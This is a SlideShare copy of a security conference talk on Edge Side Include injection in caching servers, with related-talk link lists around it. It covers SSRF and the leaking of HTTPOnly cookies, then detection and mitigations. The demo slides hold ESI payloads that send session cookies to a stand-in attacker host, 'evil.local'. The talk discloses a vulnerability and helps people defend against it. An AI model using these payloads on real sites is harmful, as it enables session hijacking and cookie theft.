Priyanka Aash, profile picture
Uploaded byPriyanka Aash
PDF, PPTX540 views

Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

The document discusses a new class of attacks exploiting Edge Side Includes (ESI) in caching servers, revealing vulnerabilities that can lead to Remote Code Execution (RCE) and session hijacking. It showcases examples of how these attacks can be executed through ESI tags and offers proof of concepts demonstrating the potential for leaking sensitive information, such as HTTP cookies. Mitigation strategies, including the use of mod_security and proactive escaping techniques, are also presented to address these security concerns.

Embed presentation

Download as PDF, PPTX
Edge Side Include Injection Abusing Caching Servers into SSRF and Transparent Session Hijacking Louis Dion-Marcil @ldionmarcil GoSecure
Edge Side Includes (ESI) — Context ❖ New class of attack on some caching servers ❖ Discovered by reading documentation
ESI — Brief Overview
ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C
ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C Variable Fragments Static Fragment
ESI — Brief Overview ❖ Adds fragmentation to caching ❖ App Server send fragment markers in HTTP responses <esi:[action] attr="val" /> ❖ ESI tags are parsed by the HTTP surrogate (load balancer, proxy) ❖ Most engines require specific App Server HTTP Headers
ESI Features & Syntax — Include //esi/page-1.html: <html> <p>This is page 1!</p> <esi:include src="//api/page-2.html" /> </html> //api/page-2.html: <p>This is page 2!</p>
ESI Features & Syntax — Include $ curl -s http://esi/page-1.html <html> <p>This is page 1!</p> <p>This is page 2!</p> </html>
ESI — Include Network Flow (Cache MISS)
ESI — Include Network Flow (Cache MISS) ①/1.html
ESI — Include Network Flow (Cache MISS) ①/1.html ②/1.html
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ⑥ + ESI tags processed
ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars>
ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars> $(HTTP_USER_AGENT) → Mozilla/5.0 (X11;[…] $(QUERY_STRING) → city=Montreal&format=C $(HTTP_COOKIE) → _ga=[…]&__utma=[…]
ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate?
ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate? It can’t, and that’s a pretty big design flaw.
ESI — Injection <p> City: <?= $_GET['city'] ?> </p>
ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
ESI Implementations — Apache Traffic Server ❖ Donated by Yahoo! to Apache ❖ ESI stack implemented, with bonus features ❖ Used by Yahoo, Apple
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅ → "_ga=[…]&PHPSESSID=b9gcvscc[…]"
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... ">
DEMO 1 — Proof of concept http://evil.local/username=attacker;session_cookie=s%3A... Internet
DEMO 1 Now we know... ❖ … we can inject ESI tags, ❖ … we can leak HTTPOnly cookies, ❖ … we don’t need JavaScript. Let’s crank the impact up a notch.
ESI Implementations — Oracle Web Cache ❖ Part of the 11g suite ❖ Usually serves WebLogic Application Servers ❖ Initial ESI specification implemented, plus features
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/?lHKlM77VbP79hDnMX2Gg..."); x.send(); </esi:inline>
DEMO 2 — Proof of concept http://evil.local/?lHKlM77VbP79hDnMX2Gg... Internet
DEMO 2 Now we know... ❖ … we can overwrite arbitrary cache entries, ❖ … we can leak HTTPOnly cookies, ❖ … JavaScript helps, but not required.
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" }
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } Invalid ESI tag!
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } "last_name": "<esi:include src=/page-2.html />" ❖ This is valid with Apache Traffic Server Invalid ESI tag!
SSRF with Apache Traffic Server
SSRF with Apache Traffic Server
SSRF with Apache Traffic Server
ESI — SSRF Flow ①/api/me /api/me + ESI ②/api/me ③ /server-status server-status⑤ ⑥ + ESI tags processed ④
ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌
ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌ ESI — Automatic Detection ❖ Burp ActiveScan++ ❖ Burp Upload Scanner ❖ Acunetix
ESI — Migration (by Lukas Rieder @overbryd) ❖ Cloudflare Workers https://gist.github.com/Overbryd/c070bb1fa769609d404f648c d506340f
Questions? Detailed blogpost of our prior research: https://gosecure.net/2018/04/03/beyond-xss-edge-side-include-injection/ Louis Dion-Marcil @ldionmarcil GoSecure

More Related Content

PPT
Chapter 11 I/o management - William stallings .ppt
byGMRavinduDulshan
 
PPSX
Introduction to java
byAjay Sharma
 
PPTX
Session tracking In Java
byhoneyvachharajani
 
PPT
JavaScript Control Statements I
byReem Alattas
 
PDF
Fixed partitioning of memory
byJohn Scott Giini
 
PPTX
Java exception handling
byBHUVIJAYAVELU
 
PPT
Design Pattern For C# Part 1
byShahzad
 
PDF
Primary Key & Foreign Key part10
byDrMohammed Qassim
 
Chapter 11 I/o management - William stallings .ppt
byGMRavinduDulshan
 
Introduction to java
byAjay Sharma
 
Session tracking In Java
byhoneyvachharajani
 
JavaScript Control Statements I
byReem Alattas
 
Fixed partitioning of memory
byJohn Scott Giini
 
Java exception handling
byBHUVIJAYAVELU
 
Design Pattern For C# Part 1
byShahzad
 
Primary Key & Foreign Key part10
byDrMohammed Qassim
 

What's hot

PPT
Chapter 8 - Virtual memory - William stallings.ppt
byGMRavinduDulshan
 
PPTX
Core java complete ppt(note)
byarvind pandey
 
PPTX
Servlets api overview
byramya marichamy
 
PDF
Java Programming
byAnjan Mahanta
 
PPTX
Java script errors &amp; exceptions handling
byAbhishekMondal42
 
PPTX
Operating System lab
bySeyed Ehsan Beheshtian
 
PDF
Android webservices
byKrazy Koder
 
PDF
Alamo ACE - Threat Hunting with CVAH
byBrandon DeVault
 
PPTX
Threading in C#
byMedhat Dawoud
 
PPT
Process Management.ppt
byJeelBhanderi4
 
PPTX
Desktop and multiprocessor systems
byV.V.Vanniaperumal College for Women
 
PPTX
Testing and types of Testing
byMunaam Munawar
 
PPTX
The dawn of big data
byNeal Hannon
 
PPTX
Transaction management DBMS
byMegha Patel
 
PPSX
Screen orientations in android
bymanjakannar
 
PPTX
Active database
bymridul mishra
 
PDF
Database 2 ddbms,homogeneous & heterognus adv & disadvan
byIftikhar Ahmad
 
PPT
Android - Values folder
byManeesha Caldera
 
PPT
Architecture of Linux
bySHUBHA CHATURVEDI
 
PPTX
Garbage collection
bySomya Bagai
 
Chapter 8 - Virtual memory - William stallings.ppt
byGMRavinduDulshan
 
Core java complete ppt(note)
byarvind pandey
 
Servlets api overview
byramya marichamy
 
Java Programming
byAnjan Mahanta
 
Java script errors &amp; exceptions handling
byAbhishekMondal42
 
Operating System lab
bySeyed Ehsan Beheshtian
 
Android webservices
byKrazy Koder
 
Alamo ACE - Threat Hunting with CVAH
byBrandon DeVault
 
Threading in C#
byMedhat Dawoud
 
Process Management.ppt
byJeelBhanderi4
 
Desktop and multiprocessor systems
byV.V.Vanniaperumal College for Women
 
Testing and types of Testing
byMunaam Munawar
 
The dawn of big data
byNeal Hannon
 
Transaction management DBMS
byMegha Patel
 
Screen orientations in android
bymanjakannar
 
Active database
bymridul mishra
 
Database 2 ddbms,homogeneous & heterognus adv & disadvan
byIftikhar Ahmad
 
Android - Values folder
byManeesha Caldera
 
Architecture of Linux
bySHUBHA CHATURVEDI
 
Garbage collection
bySomya Bagai
 

Similar to Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

PDF
Ch 10: Hacking Web Servers
bySam Bowne
 
PPT
Web Hacking
byInformation Technology
 
PDF
Locking the Throneroom 2.0
byMario Heiderich
 
PDF
CNIT 129S: 10: Attacking Back-End Components
bySam Bowne
 
PDF
cyber security-ethical hacking web servers.pdf
byjayaprasanna10
 
PDF
Web Security - Introduction
bySQALab
 
PPTX
Burp Suite is a powerful and widely-used tool
bywaudit1
 
PDF
Module 11 (hacking web servers)
byWail Hassan
 
PDF
TriplePlay-WebAppPenTestingTools
byYury Chemerkin
 
ODP
When dynamic becomes static - the next step in web caching techniques
byWim Godden
 
PPT
Life on the Edge with ESI
byKit Chan
 
ODP
When dynamic becomes static : the next step in web caching techniques
byWim Godden
 
PDF
Velocity china2012kit life on edge —— 如何使用 esi 完成任务
byMichael Zhang
 
PPT
gofortution
bygofortution
 
PDF
Securing your EmberJS Application
byPhilippe De Ryck
 
PDF
Web Security - Introduction v.1.3
byOles Seheda
 
PPT
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
byStephan Chenette
 
PDF
Securing your web application through HTTP headers
byAndre N. Klingsheim
 
PPT
Design Reviewing The Web
byamiable_indian
 
PPT
Dmk Bo2 K7 Web
byroyans
 
Ch 10: Hacking Web Servers
bySam Bowne
 
Web Hacking
byInformation Technology
 
Locking the Throneroom 2.0
byMario Heiderich
 
CNIT 129S: 10: Attacking Back-End Components
bySam Bowne
 
cyber security-ethical hacking web servers.pdf
byjayaprasanna10
 
Web Security - Introduction
bySQALab
 
Burp Suite is a powerful and widely-used tool
bywaudit1
 
Module 11 (hacking web servers)
byWail Hassan
 
TriplePlay-WebAppPenTestingTools
byYury Chemerkin
 
When dynamic becomes static - the next step in web caching techniques
byWim Godden
 
Life on the Edge with ESI
byKit Chan
 
When dynamic becomes static : the next step in web caching techniques
byWim Godden
 
Velocity china2012kit life on edge —— 如何使用 esi 完成任务
byMichael Zhang
 
gofortution
bygofortution
 
Securing your EmberJS Application
byPhilippe De Ryck
 
Web Security - Introduction v.1.3
byOles Seheda
 
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
byStephan Chenette
 
Securing your web application through HTTP headers
byAndre N. Klingsheim
 
Design Reviewing The Web
byamiable_indian
 
Dmk Bo2 K7 Web
byroyans
 

More from Priyanka Aash

PDF
Finetuning GenAI For Hacking and Defending
byPriyanka Aash
 
PDF
From Chatbot to Destroyer of Endpoints - Can ChatGPT Automate EDR Bypasses (1...
byPriyanka Aash
 
PDF
Keynote : Presentation on SASE Technology
byPriyanka Aash
 
PDF
Lessons Learned from Developing Secure AI Workflows.pdf
byPriyanka Aash
 
PDF
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
byPriyanka Aash
 
PDF
Techniques for Automatic Device Identification and Network Assignment.pdf
byPriyanka Aash
 
PDF
Cyber Defense Matrix Workshop - RSA Conference
byPriyanka Aash
 
PDF
Redefining Cybersecurity with AI Capabilities
byPriyanka Aash
 
PDF
Securing AI - There Is No Try, Only Do!.pdf
byPriyanka Aash
 
PDF
Oh, the Possibilities - Balancing Innovation and Risk with Generative AI.pdf
byPriyanka Aash
 
PDF
Coordinated Disclosure for ML - What's Different and What's the Same.pdf
byPriyanka Aash
 
PPTX
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
byPriyanka Aash
 
PDF
A Constitutional Quagmire - Ethical Minefields of AI, Cyber, and Privacy.pdf
byPriyanka Aash
 
PDF
10 Key Challenges for AI within the EU Data Protection Framework.pdf
byPriyanka Aash
 
PDF
GenAI Opportunities and Challenges - Where 370 Enterprises Are Focusing Now.pdf
byPriyanka Aash
 
PDF
Keynote : AI & Future Of Offensive Security
byPriyanka Aash
 
PDF
Demystifying Neural Networks And Building Cybersecurity Applications
byPriyanka Aash
 
PDF
(CISOPlatform Summit & SACON 2024) Kids Cyber Security .pdf
byPriyanka Aash
 
PDF
(CISOPlatform Summit & SACON 2024) Cyber Insurance & Risk Quantification.pdf
byPriyanka Aash
 
PDF
(CISOPlatform Summit & SACON 2024) Regulation & Response In Banks.pdf
byPriyanka Aash
 
Finetuning GenAI For Hacking and Defending
byPriyanka Aash
 
From Chatbot to Destroyer of Endpoints - Can ChatGPT Automate EDR Bypasses (1...
byPriyanka Aash
 
Keynote : Presentation on SASE Technology
byPriyanka Aash
 
Lessons Learned from Developing Secure AI Workflows.pdf
byPriyanka Aash
 
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
byPriyanka Aash
 
Techniques for Automatic Device Identification and Network Assignment.pdf
byPriyanka Aash
 
Cyber Defense Matrix Workshop - RSA Conference
byPriyanka Aash
 
Redefining Cybersecurity with AI Capabilities
byPriyanka Aash
 
Securing AI - There Is No Try, Only Do!.pdf
byPriyanka Aash
 
Oh, the Possibilities - Balancing Innovation and Risk with Generative AI.pdf
byPriyanka Aash
 
Coordinated Disclosure for ML - What's Different and What's the Same.pdf
byPriyanka Aash
 
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
byPriyanka Aash
 
A Constitutional Quagmire - Ethical Minefields of AI, Cyber, and Privacy.pdf
byPriyanka Aash
 
10 Key Challenges for AI within the EU Data Protection Framework.pdf
byPriyanka Aash
 
GenAI Opportunities and Challenges - Where 370 Enterprises Are Focusing Now.pdf
byPriyanka Aash
 
Keynote : AI & Future Of Offensive Security
byPriyanka Aash
 
Demystifying Neural Networks And Building Cybersecurity Applications
byPriyanka Aash
 
(CISOPlatform Summit & SACON 2024) Kids Cyber Security .pdf
byPriyanka Aash
 
(CISOPlatform Summit & SACON 2024) Cyber Insurance & Risk Quantification.pdf
byPriyanka Aash
 
(CISOPlatform Summit & SACON 2024) Regulation & Response In Banks.pdf
byPriyanka Aash
 

Recently uploaded

PDF
Agentic Intro and Hands-on: Build your first Coded Agent
byUiPathCommunity
 
PDF
[DevFest Strasbourg 2025] - NodeJs Can do that !!
bymoassiongbon
 
PDF
[BDD 2025 - Full-Stack Development] Agentic AI Architecture: Redefining Syste...
byWintari Yasmin
 
PPTX
MuleSoft AI Series : Introduction to MCP
byMulesoftMunichMeetup
 
PDF
Accessibility & Inclusion: What Comes Next. Presentation of the Digital Acces...
byAssociazione Digital Days
 
PDF
Parallel Computing BCS702 Module notes of the vtu college 7th sem 4.pdf
byMatheshVishnu
 
PDF
How Much Does It Cost to Build an eCommerce Website in 2025.pdf
byPixlogix Infotech
 
PDF
Dev Dives: Build smarter agents with UiPath Agent Builder
byUiPathCommunity
 
PPTX
The power of Slack and MuleSoft | Bangalore MuleSoft Meetup #60
byshyamraj55
 
PDF
[BDD 2025 - Artificial Intelligence] Building AI Systems That Users (and Comp...
byWintari Yasmin
 
PDF
[BDD 2025 - Mobile Development] Crafting Immersive UI with E2E and AGSL Shade...
byWintari Yasmin
 
PPTX
Guardrails in Action - Ensuring Safe AI with Azure AI Content Safety.pptx
byUdaiappa Ramachandran
 
PDF
MuleSoft Meetup: Dreamforce'25 Tour- Vibing With AI & Agents.pdf
byTintu Jacob Shaji
 
PDF
10 Best Automation QA Testing Software Tools in 2025.pdf
byRohitBhandari66
 
PDF
[BDD 2025 - Full-Stack Development] PHP in AI Age: The Laravel Way. (Rizqy Hi...
byWintari Yasmin
 
PDF
Lets Build a Serverless Function with Kiro
byChris Bingham
 
PDF
KMWorld - KM & AI Bring Collectivity, Nostalgia, & Selectivity
byJonathan Ralton
 
PDF
5 Common Supply Chain Attacks and How They Work | CyberPro Magazine
byCyberPro Magazine
 
PPTX
Connecting the unconnectable: Exploring LoRaWAN for IoT
byasasiraarthur
 
PDF
Cybersecurity Prevention and Detection: Unit 2
byVICTOR MAESTRE RAMIREZ
 
Agentic Intro and Hands-on: Build your first Coded Agent
byUiPathCommunity
 
[DevFest Strasbourg 2025] - NodeJs Can do that !!
bymoassiongbon
 
[BDD 2025 - Full-Stack Development] Agentic AI Architecture: Redefining Syste...
byWintari Yasmin
 
MuleSoft AI Series : Introduction to MCP
byMulesoftMunichMeetup
 
Accessibility & Inclusion: What Comes Next. Presentation of the Digital Acces...
byAssociazione Digital Days
 
Parallel Computing BCS702 Module notes of the vtu college 7th sem 4.pdf
byMatheshVishnu
 
How Much Does It Cost to Build an eCommerce Website in 2025.pdf
byPixlogix Infotech
 
Dev Dives: Build smarter agents with UiPath Agent Builder
byUiPathCommunity
 
The power of Slack and MuleSoft | Bangalore MuleSoft Meetup #60
byshyamraj55
 
[BDD 2025 - Artificial Intelligence] Building AI Systems That Users (and Comp...
byWintari Yasmin
 
[BDD 2025 - Mobile Development] Crafting Immersive UI with E2E and AGSL Shade...
byWintari Yasmin
 
Guardrails in Action - Ensuring Safe AI with Azure AI Content Safety.pptx
byUdaiappa Ramachandran
 
MuleSoft Meetup: Dreamforce'25 Tour- Vibing With AI & Agents.pdf
byTintu Jacob Shaji
 
10 Best Automation QA Testing Software Tools in 2025.pdf
byRohitBhandari66
 
[BDD 2025 - Full-Stack Development] PHP in AI Age: The Laravel Way. (Rizqy Hi...
byWintari Yasmin
 
Lets Build a Serverless Function with Kiro
byChris Bingham
 
KMWorld - KM & AI Bring Collectivity, Nostalgia, & Selectivity
byJonathan Ralton
 
5 Common Supply Chain Attacks and How They Work | CyberPro Magazine
byCyberPro Magazine
 
Connecting the unconnectable: Exploring LoRaWAN for IoT
byasasiraarthur
 
Cybersecurity Prevention and Detection: Unit 2
byVICTOR MAESTRE RAMIREZ
 

Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

  • 1.
    Edge Side IncludeInjection Abusing Caching Servers into SSRF and Transparent Session Hijacking Louis Dion-Marcil @ldionmarcil GoSecure
  • 2.
    Edge Side Includes(ESI) — Context ❖ New class of attack on some caching servers ❖ Discovered by reading documentation
  • 3.
    ESI — BriefOverview
  • 4.
    ESI — BriefOverview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C
  • 5.
    ESI — BriefOverview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C Variable Fragments Static Fragment
  • 6.
    ESI — BriefOverview ❖ Adds fragmentation to caching ❖ App Server send fragment markers in HTTP responses <esi:[action] attr="val" /> ❖ ESI tags are parsed by the HTTP surrogate (load balancer, proxy) ❖ Most engines require specific App Server HTTP Headers
  • 7.
    ESI Features &Syntax — Include //esi/page-1.html: <html> <p>This is page 1!</p> <esi:include src="//api/page-2.html" /> </html> //api/page-2.html: <p>This is page 2!</p>
  • 8.
    ESI Features &Syntax — Include $ curl -s http://esi/page-1.html <html> <p>This is page 1!</p> <p>This is page 2!</p> </html>
  • 9.
    ESI — IncludeNetwork Flow (Cache MISS)
  • 10.
    ESI — IncludeNetwork Flow (Cache MISS) ①/1.html
  • 11.
    ESI — IncludeNetwork Flow (Cache MISS) ①/1.html ②/1.html
  • 12.
    ESI — IncludeNetwork Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③
  • 13.
    ESI — IncludeNetwork Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ESI tags processed
  • 14.
    ESI — IncludeNetwork Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html ESI tags processed
  • 15.
    ESI — IncludeNetwork Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ESI tags processed
  • 16.
    ESI — IncludeNetwork Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ⑥ + ESI tags processed
  • 17.
    ESI Features &Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars>
  • 18.
    ESI Features &Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars> $(HTTP_USER_AGENT) → Mozilla/5.0 (X11;[…] $(QUERY_STRING) → city=Montreal&format=C $(HTTP_COOKIE) → _ga=[…]&__utma=[…]
  • 19.
    ESI — Vulnerabilities ESItags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate?
  • 20.
    ESI — Vulnerabilities ESItags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate? It can’t, and that’s a pretty big design flaw.
  • 21.
    ESI — Injection <p> City:<?= $_GET['city'] ?> </p>
  • 22.
    ESI — Injection <p> City:<?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
  • 23.
    ESI — Injection <p> City:<?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
  • 24.
    ESI Implementations —Apache Traffic Server ❖ Donated by Yahoo! to Apache ❖ ESI stack implemented, with bonus features ❖ Used by Yahoo, Apple
  • 25.
    ESI Implementations —Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌
  • 26.
    ESI Implementations —Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅
  • 27.
    ESI Implementations —Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅ → "_ga=[…]&PHPSESSID=b9gcvscc[…]"
  • 28.
    DEMO 1 —Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
  • 29.
    DEMO 1 —Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
  • 30.
    DEMO 1 —Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... ">
  • 31.
    DEMO 1 —Proof of concept http://evil.local/username=attacker;session_cookie=s%3A... Internet
  • 32.
    DEMO 1 Now weknow... ❖ … we can inject ESI tags, ❖ … we can leak HTTPOnly cookies, ❖ … we don’t need JavaScript. Let’s crank the impact up a notch.
  • 33.
    ESI Implementations —Oracle Web Cache ❖ Part of the 11g suite ❖ Usually serves WebLogic Application Servers ❖ Initial ESI specification implemented, plus features
  • 34.
    DEMO 2 —Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
  • 35.
    DEMO 2 —Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
  • 36.
    DEMO 2 —Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/?lHKlM77VbP79hDnMX2Gg..."); x.send(); </esi:inline>
  • 37.
    DEMO 2 —Proof of concept http://evil.local/?lHKlM77VbP79hDnMX2Gg... Internet
  • 38.
    DEMO 2 Now weknow... ❖ … we can overwrite arbitrary cache entries, ❖ … we can leak HTTPOnly cookies, ❖ … JavaScript helps, but not required.
  • 39.
    ESI — Mitigations ❖mod_security with the OWASP Core Rule Set
  • 40.
    ESI — Mitigations ❖mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" }
  • 41.
    ESI — Mitigations ❖mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } Invalid ESI tag!
  • 42.
    ESI — Mitigations ❖mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } "last_name": "<esi:include src=/page-2.html />" ❖ This is valid with Apache Traffic Server Invalid ESI tag!
  • 43.
    SSRF with ApacheTraffic Server
  • 44.
    SSRF with ApacheTraffic Server
  • 45.
    SSRF with ApacheTraffic Server
  • 46.
    ESI — SSRFFlow ①/api/me /api/me + ESI ②/api/me ③ /server-status server-status⑤ ⑥ + ESI tags processed ④
  • 47.
    ESI — ManualDetection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌
  • 48.
    ESI — ManualDetection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌ ESI — Automatic Detection ❖ Burp ActiveScan++ ❖ Burp Upload Scanner ❖ Acunetix
  • 49.
    ESI — Migration(by Lukas Rieder @overbryd) ❖ Cloudflare Workers https://gist.github.com/Overbryd/c070bb1fa769609d404f648c d506340f
  • 50.
    Questions? Detailed blogpost ofour prior research: https://gosecure.net/2018/04/03/beyond-xss-edge-side-include-injection/ Louis Dion-Marcil @ldionmarcil GoSecure